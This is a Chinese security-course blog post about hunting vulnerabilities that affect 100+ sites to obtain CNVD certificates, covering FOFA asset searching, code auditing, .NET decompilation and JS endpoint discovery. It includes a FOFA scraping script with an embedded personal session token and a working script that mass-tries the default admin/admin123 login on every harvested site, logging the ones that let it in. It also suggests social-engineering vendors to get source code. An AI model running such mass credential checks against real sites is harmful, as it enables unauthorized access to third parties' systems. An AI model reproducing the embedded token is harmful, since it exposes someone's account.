88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统

目录

    • 1.开源系统、闭源系统、售卖系统
    • 2.如何寻找上述三类系统并进行安全测试
    • 3.如何挑简单的入手最快速度获取证书装x
    • 演示案例:
      • 某开源逻辑审计配合引擎实现通用
      • 某闭源审计或黑盒配合引擎实现通用
      • 某售卖审计或黑盒配合引擎实现通用
    • 涉及资源:

88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第1张图片
要挖cnvd是有一个条件的,那就是通用性要100+,就可以达到证书的级别,不然的话,没有什么作用

1.开源系统、闭源系统、售卖系统

通用性100+ :表示挖到的漏洞影响影响范围(域名、服务器、ip这些)个数达到100以上

开源系统:这套程序源码在网上已经给出来了,可以拿到源码

闭源系统:程序源码不公开,一般拿不到源码,你虽然可以接触到系统,但是里面的系统会对源代码加密或者编译,那么这套系统你是看不到真实的源代码;第二种情况是,这套系统你压根接触不到,只给你使用或者给你一个管理的使用权限,她不会给到你系统真实的组成代码

售卖系统:可能拿到源码,也可能拿不到(社工)

它们的主要区别是源码能不能得到,如果有源码我们就能够进行代码审计,我们分析代码要根据程序自身语言进行分析;如果没有源码的话,就要采用黑盒测试

2.如何寻找上述三类系统并进行安全测试

开源:各大源码站下载代码审计

闭源:Fofa搜索尝试获取源码审计,不一定能获取或黑盒测试

售卖:套路社工获取源码或购买源码审计或黑盒测试

确定无源码和常规测试没有方法的情况下,可利用JS文件寻找测试接口

3.如何挑简单的入手最快速度获取证书装x

目前java难度最大,py项目较少,挑php, aspx入手

其中php代码清晰明了,前期讲过,aspx涉及反编译代码后审计

技术点:各种语言代码审计,无源码除常规安全测试外js下的测试口等

演示案例:

某开源逻辑审计配合引擎实现通用

使用fofa搜索网站后台判断目前这套程序有多少人在使用,是否100+
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第2张图片
如果这边搜索出来的结果只有一条,那挖出来也没什么意思

在搭建网站的时候,导入数据库路径要双斜杠
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第3张图片
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第4张图片
在安装网站的时候,我们发现没有设置网站后台的账号密码,说明这个账号密码是默认
在这里插入图片描述
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第5张图片
使用脚本将刚才在fofa上搜索到符合条件的网站域名给爬下来

import requests  # requests模块是用来发送网络请求的  安装:pip install requests
import base64
from lxml import html  # lxml 提取HTML数据,安装:pip install lxml
import threading                      # 导入threading模块实现多线程
import time
 
def fofa_tiqu(Start,End):
    # 循环切换分页
    search_data = '"/admindm-yourname/g.php"'                                         # /admindm-yourname/g.php
    url = 'https://fofa.info/result?qbase64='                                         # fofa网站的url ?qbase64= 请求参数(需要base64字符串格式的参数)
    search_data_bs = str(base64.b64encode(search_data.encode("utf-8")), "utf-8")      # 把我们的搜索关键字加密成base64字符串
    headers = {                                                                       # 请求的头部,用于身份验证
        # cookie 要改成你自己的,我的账号一退出,这cookie就会过期了
        'cookie':'fofa_token=eyJhbGciOiJIUzUxMiIsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6MjUxMjA0LCJtaWQiOjEwMDE0MzE2OSwidXNlcm5hbWUiOiLpk7bmsrMiLCJleHAiOjE2ODA2OTQ3NjV9.7G0jLLhv_jDHgi_8UGtTsTSBL1iN5diS7EDQQ4oX8qYunSoJAsXWMAKm2kpVwp3Q6IeT8t7cP3bPEcDWyaWLuw;'
    }
    # 循环爬取数据
    for yeshu in range(Start,End + 1):                                                         # range(num1,num2) 创建一个数序列如:range(1,10) [1,2,...,9] 不包括num2自身
        try:
            # print(yeshu) # 1,2,3,4,5,6,7,8,9
            urls = url + search_data_bs + "&page=" + str(yeshu)  # 拼接网站url,str()将元素转换成字符串,page页数, page_size每页展示多少条数据
            print(f"正在提取第{yeshu}页数据-{urls}")
            # urls 请求的URL    headers 请求头,里面包含身份信息
            result = requests.get(urls, headers=headers).content  # 使用requests模块的get方法请求网站获取网站源代码,content读取数据
            etree = html.etree  # lxml 库提供了一个 etree 模块,该模块专门用来解析 HTML/XML 文档
            # print(result.decode('utf-8'))                                               # 查看返回结果
            soup = etree.HTML(result)  # result.decode('utf-8') 请求返回的HTML代码
            ip_data = soup.xpath('//span[@class="hsxa-host"]/a[@target="_blank"]/@href')  # 公式://标签名称[@属性='属性的值']  ,意思是先找span标签class等于hsxa-host的然后在提取其内部的a标签属性为@target="_blank"的href属性出来(就是一个筛选数据的过程,筛选符合条件的)
            # set() 将容器转换为集合类型,因为集合类型不会存储重复的数据,给ip去下重
            ipdata = '\n'.join(set(ip_data))  # join()将指定的元素以\n换行进行拆分在拼接(\n也可以换成其他字符,不过这里的需求就是把列表拆分成一行一个ip,方便后面的文件写入)
            if 'http' in ipdata:             # 判断ipdata中是否存在http字符串,存在说明数据获取成功
                print(f"第{yeshu}页数据{ipdata}")
                with open(r'ip.txt', 'a+') as f:  # open()打开函数 a+:以读写模式打开,如果文件不存在就创建,以存在就追加
                    f.write(ipdata+ '\n')  # write() 方法写入数据
            time.sleep(0.5)
        except Exception as e:
            pass
 
if __name__ == '__main__':            # __main__ 就是一个模块的测试变量,在这个判断内的代码只会在运行当前模块才会执行,在模块外部引入文件进行调用是不会执行的
    yeshu = int(input("您要爬取多少页数据(整数):"))
    thread = 5                # 控制要创建的线程,本来开10个但是太快了服务器反应不过来,获取到的数据少了很多
    # 创建多线程,这个循环的次数越多创建的线程的次数就越多,线程不是越多越好,建议5到10个
    for x in range(1,thread + 1):
        i  = int(yeshu / thread)    # 页数除线程数(目的是让每一个线程都获取部分数据,分工)
        End = int(i * x)            # 结束的页数,设yeshu=50: 5、10、15、20、25...
        Start = int(i * (x-1) +1)   # 开始的页数,            1、6、11、16、21
        # 我上面这样写的目的就是,让线程分工合作。如:线程1就去获取1 -5页的数据、线程2就去获取6 -10页的数据...
        # print(Start,End)
 
        t = threading.Thread(target=fofa_tiqu,kwargs={"Start":Start,"End":End})     # 创建线程对象,target=执行目标任务名,args 以元组的形式传参,kwargs 以字典的形式传参
        t.start()                      # 启动线程,让他开始工作

88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第6张图片
再使用脚本帮我们检测弱口令

import requests  # requests模块是用来发送网络请求的  安装:pip install requests
 
def check_login():
    data={                                                     # 登录的参数,自己在本地登录拦截就知道他的请求参数是啥
        'user':'admin',
        'password':'admin123'
    }
    for ip in open('ip.txt'):                                  # ip.txt 就是刚才我们通过fofa提取出来的目标网站ip
        ip = ip.replace('\n', '')                              # replace() 方法替换字符串,将换行替换为空
        urls = ip +'/admindm-yourname/mod_common/login.php?act=login'    # 拼接上我们的登录页面的url路径
        try:
            # print(f"正在检测:{ip}")
            # requests模块是用来发送网络请求的 .get() 发送get请求    status_code获取请求之后的状态码,200正常发送说明存在漏洞
            result = requests.post(urls,data=data)
            if result.status_code == 200:                          # 先判断请求的状态码是否为200
                # content获取返回的数据  decode 指定获取数据的编码格式
                if 'sorry' in result.content.decode('utf-8'):      # 判断当前网站是否存在漏洞(从响应的数据中判断是否存在sorry,如果存在就是登录失败,否则登录成功)
                    print(ip+' | no')
                else:
                    print(ip+' | ok')
                    # print(poc_data.content.decode('utf-8'))
                    with open(r'vuln.txt', 'a') as f:                         # 将存在漏洞的网站url存入本地文件中
                        f.write(ip + '\n')                                    # write()文件写入方法,\n 换行让一个url占一行
        except Exception as e:
            pass
            # print(e)
 
if __name__ == '__main__':
    check_login()

88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第7张图片
我们也可以使用js文件进行网站搜索
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第8张图片
这边的结果是有300多个
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第9张图片
cnvd搜索这套系统之前的漏洞提交情况
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第10张图片88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第11张图片
可能我们的技术不高,但是我们的思路够骚,也是可以吃到西瓜的

某闭源审计或黑盒配合引擎实现通用

Seay源代码审计系统——(只支持PHP语言,单一,速度快,审计结果相对Fortify较少)

github下载:https://github.com/f1tz/cnseay

直接下载:https://download.ihsdus.cn/down/2022down/3/01/Seayydmsjxt.rar?timestamp=640dd

88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第12张图片
有些漏洞位置在后台目录下,这些漏洞的利用前提是需要后台权限,意义不大,可忽略

某售卖审计或黑盒配合引擎实现通用

1.尝试性获取源码
2.类似java或.net编译类文件反编译源码-dnspy,idea
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第13张图片
很多源码封装成dll,放到bin目录的
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第14张图片
把这些dll文件导入进去
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第15张图片
现在我们看它源码,一个个分析
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第16张图片

3.无源码情况下的JS接口数据提交测试模拟-jsfinder,手工,扫描
例:使用fofa搜索:app=“网校登录系统”
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第17张图片
这是一个网站系统
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第18张图片
我们在没有网站的信息情况下面,首先排除常规测试,就是工具扫一下,我们这里讲一下js测试的

源码有php、python、java这种脚本去处理,还有一种是js处理,例如登录请求可以使用后端代码去处理,也可以通过js里面的ajax或里面的代码去处理,所以这个js也可以和数据进行交互

使用jsfind爬取目标接口

python3 JSFinderPlus.py -u 目标url

88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第19张图片
通过jsfind这个工具和脚本发现这个网站有更多测试的地方,通过扫描工具是扫不出这个结果,因为它后面还跟着参数
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第20张图片
jsfind的原理就是类似爬虫,通过前端代码去发现这些接口,获取你网页加载资源文件里面返回的东西,来获取更多类似爬虫的东西,然后把这个东西展示出来
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第21张图片
jsfind在结果上有些不全,误报或者不灵,尽量手工配合这个工具一起使用

也可以使用fuzz字典当中的js路径配合路径扫描工具进行扫描
88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统_第22张图片
我们可以打开这些接口,去发现里面有没有一些新的接口、URL地址、资产信息和一些相关的js代码,分析js代码有没有一些调用接口,新的地址出现

如果实在没有源码,或者常规渗透完,可以找js接口进行测试

python是我们在挖掘漏洞里面的一个好帮手,在大家搞ctf比赛,红蓝对抗、挖漏洞,后期涨薪水,工作里面处理任务,这个python都有用处

谷歌验证码,拖放式验证码,人工智能的验证码,那就没有办法了,如果单纯式图片形式的那可以

涉及资源:

js链接爬取:https://github.com/Threezh1/JSFinder
dnSpy反编译文件:
https://fletime.lanzoux.com/iDxcCj60qlc
https://fletime.lanzoux.com/iP8sCj60scf
https://fletime.lanzoux.com/i3kGmj5yqwb
网站测试字典:https://github.com/TheKingOfDuck/fuzzDicts

你可能感兴趣的:(小迪安全,web安全)